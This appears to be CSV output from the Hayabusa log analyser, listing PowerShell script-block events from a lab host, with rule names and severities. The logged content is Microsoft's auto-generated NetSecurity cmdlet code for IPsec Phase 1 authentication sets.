__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' -Alias '*' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcess",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ 
} { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' -Alias '*' function Copy-NetIPsecPhase1AuthSet { 
[CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper 
-is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcess",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 